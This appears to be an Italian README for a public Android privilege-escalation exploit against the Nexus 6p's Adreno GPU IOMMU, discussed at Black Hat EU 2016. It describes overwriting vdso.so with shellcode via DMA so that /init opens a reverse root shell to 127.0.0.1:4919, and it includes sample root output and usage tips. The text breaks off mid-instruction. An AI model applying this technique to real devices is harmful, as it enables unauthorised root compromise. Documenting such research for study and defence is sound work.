
Exploit DMA IOMMU GPU per dispositivi Android che sovrascrive vdso.so con shellcode per escalare i privilegi e generare una reverse root shell su Nexus 6p.
Testato su Nexus 6p (google/angler/angler:6.0.1/MMB29M/2431559:user/release-keys)
Discusso nel 2016 tramite Blackhat EU
Con scritture iommu dma, vdso.so viene sovrascritto con shellcode.
Quindi dopo che /init esegue __kernel_clock_gettime, lo shellcode verrà eseguito.
Il processo /init quindi si riconnette con una shell root.
Reverse shell target: 127.0.0.1:4919
shellcode patch done
hook patch done
Waiting for reverse connect shell...
TERMINAL>>>
id
uid=0(root) gid=0(root) groups=0(root) context=u:r:init:s0
Elimina /data/local/tmp/x se presente prima dell'exploit.
Se il tempo di attesa è troppo lungo, prova ad aprire le opzioni "Data e ora" nelle impostazioni del telefono.
Controlla la versione dell'adreno, attualmente è costruito per 4xx.
Per 5xx e superiori: